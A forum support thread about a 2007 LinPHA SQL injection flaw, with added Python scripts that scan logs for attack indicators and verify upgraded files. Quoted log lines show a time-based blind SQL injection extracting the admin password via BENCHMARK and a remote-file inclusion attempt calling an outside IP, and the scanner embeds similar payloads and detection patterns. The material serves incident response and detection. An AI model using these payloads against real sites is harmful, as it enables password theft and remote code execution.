Hi,
my database gets flooded with this crap, any idea when we can hope for a patch?
http://www.securityfocus.com/bid/25119
thx a lot!
am I the only one getting this? This seems to be a security issue found by SecurityFocus, nobody cares?
strange.
best regards
hhmmmm I guess you didn't notice the new release that fixed that bug???
1.3.2 on 10/08/2007
you mean the release from today, which I didn't notice 2 days ago?
damn me, I'm so stupid :-)
thx for the update!
no I simply meant the release released before your second post.
BTW, thank you for bringing this security flaw to our attention :)
Hi,
well I got the same injections, I installed 1.3.2, I copied all files except SQL and the other dir mentioned in docs, don't remember which atm.
I even reloaded Apache, although I guess it's not necessary...
any ideas?
thx a lot!
and you are _really_ sure you have replaced at least the file functions\db_api.php?
flo
Hey,
if one is using the exploit there is not much that we can do. The thing is that the exploit just doesn't work anymore with 1.3.2. But you can't prevent one from using the exploit, even against 1.3.2.
cheers bzrudi
huh, I don't understand: the exploit is not working anymore, so what would it matter if one tried using it?
Looks to me like I upgraded fine and the exploit is still working... see my other post.
greetings!
how do you know that the exploit is still working?
what happens exactly?
you are sure you have changed your passwords?
flo
password? I didn't know I had to change any, sorry if I missed that in the docs!
Which ones do I need to change, LinPHA passwords and/or the MySQL password?
thx!
please also answer the other questions!
if someone breaks into my server I would always change my passwords
if they could get the linpha admin password, they can do almost everything on the server with the integrated filemanager
flo
no, they can only access what Apache can access, if I'm not wrong...
You are right, but one might use the filemanager to upload some other files to LinPHA and use them to do other things ;-)
So what did the mysql logs say in detail?
Thanks!
cheers bzrudi
exactly
they may have uploaded their own PHP filemanager which can now access all files Apache can access
flo
hmm, Apache can only access a few dirs and only write into log dirs and /tmp. I have now changed the LinPHA users' passwords, let's see what happens. I have seen this in messages:
Aug 8 19:19:49 zer09 httpd: LinPHA DATABASE | ERROR | 20070808 191949 | 212.241.197.108 | mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'://212.241.197.108/remot.txt?\' at line 1] in EXECUTE(\"SELECT linpha_photos.id AS id, linph...
looks like someone tried to execute a statement.
I haven't found any successful execution of a MySQL statement in the log...
and what's in your Apache access logs?
I would look through every PHP file in your htdocs
it could be anywhere
if you want to be 100% sure that your server is clean you have to format the hard drives, reinstall and restore a backup
flo
I found this:
access_log:41.251.3.17 - - [31/Jul/2007:00:35:37 +0200] "GET /new_images.php?order=id,(SELECT/**/password/**/FROM/**/linpha_users/**/WHERE/**/id=1/**/OR/**/RAND(IF((ORD(SUBSTRING(password,1,1))=102),BENCHMARK(1000000,MD5(1)),1))) HTTP/1.1" 200 688
damn, I got like 30 vhosts on the server and tons of other services... rebuilding it would be nuts :-)
Hey,
ok, this one is from the exploit. BUT I ran this exploit against three LinPHA installations many times without one success. So it does not necessarily mean that one got the LinPHA admin pass. I would recommend watching for obvious files in your webroot, installing a rootkit checker like rkhunter, and watching traffic and logs. Enable LinPHA logging and watch for suspicious admin logins.
cheers bzrudi
hismanio,
the exploit you mentioned tries to get the LinPHA admin user password. The line you posted has absolutely nothing to do with that exploit. The line posted tries a remote code execution.
Check your logs for the word "BENCHMARK", this is what is used in queries by the exploit.
cheers bzrudi
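The two pieces of advice in this thread (grep the access log for BENCHMARK, and read the LinPHA DATABASE error lines in syslog) can be turned into a small scanner. The script below is an added example written for this thread, not code from the LinPHA project or from any poster. It parses Apache access-log lines, percent-decodes the request target, collapses the /**/ comments the quoted request uses in place of spaces, and flags the indicators visible in the thread: BENCHMARK()/SLEEP() timing probes, reads of the password column, and a remote URL passed in a parameter. It also pulls the source IP out of LinPHA's database error lines so the two logs can be correlated. All sample log lines are constructed (documentation IP ranges, a placeholder hostname, and a placeholder "page" parameter that is not a LinPHA parameter); the rule names and thresholds are this example's own choices.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Apache access-log lines (documentation IP ranges, not real hosts).
# Line 1 mirrors the shape of the request quoted in the thread; line 2 is the same probe
# percent-encoded; line 3 is a constructed remote-URL attempt (the "page" parameter is a
# placeholder, not a LinPHA parameter); line 4 is an ordinary request.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [31/Jul/2007:00:35:37 +0200] "GET /new_images.php?order=id,(SELECT/**/password/**/FROM/**/linpha_users/**/WHERE/**/id=1/**/OR/**/RAND(IF((ORD(SUBSTRING(password,1,1))=102),BENCHMARK(1000000,MD5(1)),1))) HTTP/1.1" 200 688
203.0.113.5 - - [31/Jul/2007:00:35:39 +0200] "GET /new_images.php?order=id,(SELECT%20password%20FROM%20linpha_users%20WHERE%20id=1%20OR%20RAND(IF((ORD(SUBSTRING(password,1,1))=103),BENCHMARK(1000000,MD5(1)),1))) HTTP/1.1" 200 701
198.51.100.9 - - [08/Aug/2007:19:19:49 +0200] "GET /index.php?page=http://198.51.100.9/remot.txt? HTTP/1.1" 200 512
192.0.2.44 - - [08/Aug/2007:20:01:02 +0200] "GET /new_images.php?order=name HTTP/1.1" 200 4120
"""

# Constructed syslog lines in the shape of the LinPHA DATABASE | ERROR line quoted in the thread.
SAMPLE_SYSLOG = """\
Aug  8 19:19:49 host httpd: LinPHA DATABASE | ERROR | 20070808 191949 | 198.51.100.9 | mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://198.51.100.9/remot.txt?' at line 1] in EXECUTE("SELECT linpha_photos.id AS id, linph...
Aug  8 19:20:01 host httpd: unrelated message
"""

# Apache common/combined log prefix: ip ident user [timestamp] "METHOD target PROTO" status
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# LinPHA DATABASE | ERROR | <yyyymmdd hhmmss> | <client ip> | mysql error: [<code>: ...
DB_ERR_RE = re.compile(
    r'LinPHA DATABASE \| ERROR \| (?P<stamp>\d{8} \d{6}) \| (?P<ip>\S+) \| mysql error: \[(?P<code>\d+):'
)

# Indicators, matched against the decoded and comment-stripped request target.
RULES = [
    ("time-based blind SQLi", re.compile(r'\b(BENCHMARK|SLEEP)\s*\(', re.I)),
    ("password column read", re.compile(r'SUBSTRING\s*\(\s*password|SELECT\s+password\s+FROM', re.I)),
    ("remote URL in parameter", re.compile(r'=\s*(https?|ftp)://', re.I)),
]


def normalise(target):
    """Percent-decode the target and turn /**/ comments (used instead of spaces) into spaces."""
    return re.sub(r'/\*.*?\*/', ' ', unquote_plus(target))


def scan_access_log(text):
    """Return one finding per request that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        reasons = [name for name, rx in RULES if rx.search(normalise(m.group("target")))]
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": m.group("target").split("?", 1)[0],
                "status": m.group("status"),
                "reasons": reasons,
            })
    return findings


def db_errors(text):
    """Extract (client ip, mysql error code, stamp) from LinPHA DATABASE | ERROR lines."""
    out = []
    for line in text.splitlines():
        m = DB_ERR_RE.search(line)
        if m:
            out.append((m.group("ip"), m.group("code"), m.group("stamp")))
    return out


def hits_per_ip(findings):
    """Count suspicious requests per source IP."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


def correlate(findings, errors):
    """IPs that both sent a flagged request and triggered a LinPHA database error."""
    return {f["ip"] for f in findings} & {ip for ip, _, _ in errors}


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_ACCESS_LOG)
    for f in found:
        print(f["ip"], f["time"], f["path"], "->", ", ".join(f["reasons"]))
    print("hits per IP:", hits_per_ip(found))
    print("IPs also in DB error log:", correlate(found, db_errors(SAMPLE_SYSLOG)))
```

Run it against a real access_log by replacing the constructed sample with the file's contents; a 200 status on a flagged request (as in the thread's line) only tells you the page rendered, not whether the query succeeded, which is why cross-checking against the database error log and LinPHA's own admin-login log is the useful next step.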
pretty sure I copied the new version:
[root@zer09 functions]# ls -l
total 180
-rw-r--r-- 1 1000 1000 63688 Aug 10 14:14 db_api.php
-rw-r--r-- 1 1000 1000 14135 Aug 10 14:14 filesys.php
-rw-r--r-- 1 1000 1000 2882 Aug 10 14:14 functions.php
-rw-r--r-- 1 1000 1000 12736 Aug 10 14:14 identify.php
-rw-r--r-- 1 1000 1000 26746 Aug 10 14:14 image.php
-rw-r--r-- 1 1000 1000 48543 Aug 10 14:14 other.php
[root@zer09 functions]# md5sum db_api.php
9fcdaafd5c6431c46e10f182b42e48b8 db_api.php
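An `ls -l` and a single md5sum only show that a file was written on a given date; they do not show that every file matches the release, nor whether anything was added. The script below is an added example written for this thread, not LinPHA project code, and it addresses both of flo's questions (was functions/db_api.php really replaced, and is there an unexpected PHP file somewhere under htdocs). It hashes every PHP file in a freshly extracted, pristine copy of the release and in the deployed htdocs, then reports files that differ, files the upgrade failed to copy, and files present only in the deployed tree. The two directory trees in `build_demo()` are constructed in a temporary directory purely for the demonstration; the file contents and the hypothetical `cache/x.php` are placeholders, not real LinPHA files, and SHA-256 is used in place of the md5sum shown in the post.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root, suffixes=(".php",)):
    """Map relative path -> SHA-256 hex digest for every file under root with a matching suffix."""
    root = Path(root)
    digests = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix in suffixes:
            digests[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return digests


def compare_trees(pristine, deployed):
    """Compare a pristine release tree against the deployed web root."""
    a, b = hash_tree(pristine), hash_tree(deployed)
    return {
        # same path, different content: an old (possibly vulnerable) copy or a tampered file
        "modified": sorted(k for k in a.keys() & b.keys() if a[k] != b[k]),
        # in the release but not deployed: the upgrade copy was incomplete
        "missing": sorted(a.keys() - b.keys()),
        # deployed but not in the release: review by hand (leftovers, local changes, or dropped files)
        "extra": sorted(b.keys() - a.keys()),
    }


def build_demo():
    """Construct two throwaway trees: a pristine release and a deployed copy with two problems."""
    base = Path(tempfile.mkdtemp(prefix="linpha-check-"))
    pristine, deployed = base / "linpha-release", base / "htdocs"
    files = {  # placeholder contents, not real LinPHA source
        "functions/db_api.php": "<?php // release copy of the query builder ?>",
        "functions/filesys.php": "<?php // unchanged ?>",
        "new_images.php": "<?php // gallery page ?>",
    }
    for rel, body in files.items():
        for root in (pristine, deployed):
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
    # Simulate an upgrade that missed db_api.php (old copy still deployed) ...
    (deployed / "functions/db_api.php").write_text("<?php // old copy of the query builder ?>")
    # ... and one file in the web root that is not part of the release (hypothetical path).
    stray = deployed / "cache" / "x.php"
    stray.parent.mkdir(parents=True, exist_ok=True)
    stray.write_text("<?php // not part of the release ?>")
    return str(pristine), str(deployed)


def report(pristine, deployed):
    """Human-readable summary; returns the number of discrepancies found."""
    result = compare_trees(pristine, deployed)
    for kind, paths in result.items():
        for path in paths:
            print(f"{kind:8s} {path}")
    return sum(len(v) for v in result.values())


if __name__ == "__main__":
    p, d = build_demo()
    print("discrepancies:", report(p, d))
```

For a real check, point `compare_trees()` at the unpacked release archive and the live document root; "extra" entries need a manual look because legitimate local files (configuration, uploaded albums) also show up there.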